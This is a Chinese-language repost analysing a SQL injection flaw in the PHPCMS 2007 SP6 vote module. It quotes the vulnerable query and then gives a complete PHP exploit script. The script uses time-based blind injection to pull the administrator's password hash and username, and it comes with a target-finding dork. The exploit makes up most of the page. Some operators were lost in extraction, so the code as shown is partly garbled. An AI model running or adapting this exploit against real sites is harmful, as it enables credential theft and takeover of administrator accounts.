PHPCMS2007 SP6 vote模块SQL注射漏洞的分析
PHPCMS2007 SP6 vote模块SQL注射漏洞的分析
发布时间:2016-12-21 来源:查字典编辑
摘要:漏洞代码:vote/vote.php//22行$optionids=is_array($op)?implode(',',...

漏洞代码:

vote/vote.php

// 22行

$optionids = is_array($op) ? implode(',',$op) : $op;

...

$db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number 1 WHERE optionid IN ($optionids) ");

漏洞很明显,没什么好说的,其他地方也有类似的问题,有兴趣的同学可以跟下,下面给个poc性质的exp[由于是盲注,效果不是很好]:p

代码:

#!/usr/bin/php

<?php

print_r('

---------------------------------------------------------------------------

Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit

by puret_t

mail: puretot at gmail dot com

team: http://www.wolvez.org

dork: "Powered by Phpcms 2007"

---------------------------------------------------------------------------

');

/**

* works regardless of php.ini settings

*/

if ($argc < 3) {

print_r('

---------------------------------------------------------------------------

Usage: php '.$argv[0].' host path

host: target server (ip/hostname)

path: path to phpcms

Example:

php '.$argv[0].' localhost /phpcms/

---------------------------------------------------------------------------

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$host = $argv[1];

$path = $argv[2];

$benchmark = 100000000;

$timeout = 10;

$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat#';

$resp = send();

preg_match('/([a-z0-9] )_vote_option/', $resp, $pre);

if ($pre) {

echo "Plz Waiting...n";

/**

* get admin password

*/

$j = 1;

$pass = '';

$hash[0] = 0; //null

$hash = array_merge($hash, range(48, 57)); //numbers

$hash = array_merge($hash, range(97, 102)); //a-f letters

while (strlen($pass) < 32) {

for ($i = 0; $i <= 255; $i ) {

if (in_array($i, $hash)) {

$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$pass .= chr($i);

echo chr($i);

break;

}

}

if ($i == 255)

exit("nExploit Failed!n");

}

$j ;

}

echo "t";

/**

* get admin username

*/

$j = 1;

$user = '';

while (strstr($user, chr(0)) === false) {

for ($i = 0; i <= 255; $i ) {

$cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#';

send();

usleep(2000000);

$starttime = time();

send();

$endtime = time();

$difftime = $endtime - $starttime;

if ($difftime > $timeout) {

$user .= chr($i);

echo chr($i);

break;

}

if ($i == 255)

exit("nExploit Failed!n");

}

$j ;

}

exit("Expoilt Success!nadmin:t$usernPassword(md5):t$passn");

} else

exit("Exploit Failed!n");

function send()

{

global $host, $path, $cmd;

$message = "POST ".$path."vote/vote.php HTTP/1.1rn";

$message .= "Accept: */*rn";

$message .= "Accept-Language: zh-cnrn";

$message .= "Content-Type: application/x-www-form-urlencodedrn";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn";

$message .= "CLIENT-IP: ".time()."rn";

$message .= "Host: $hostrn";

$message .= "Content-Length: ".strlen($cmd)."rn";

$message .= "Connection: Closernrn";

$message .= $cmd;

$fp = fsockopen($host, 80);

fputs($fp, $message);

$resp = '';

while ($fp && !feof($fp))

$resp .= fread($fp, 1024);

return $resp;

}

?>

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新漏洞分析学习
热门漏洞分析学习
网络安全子分类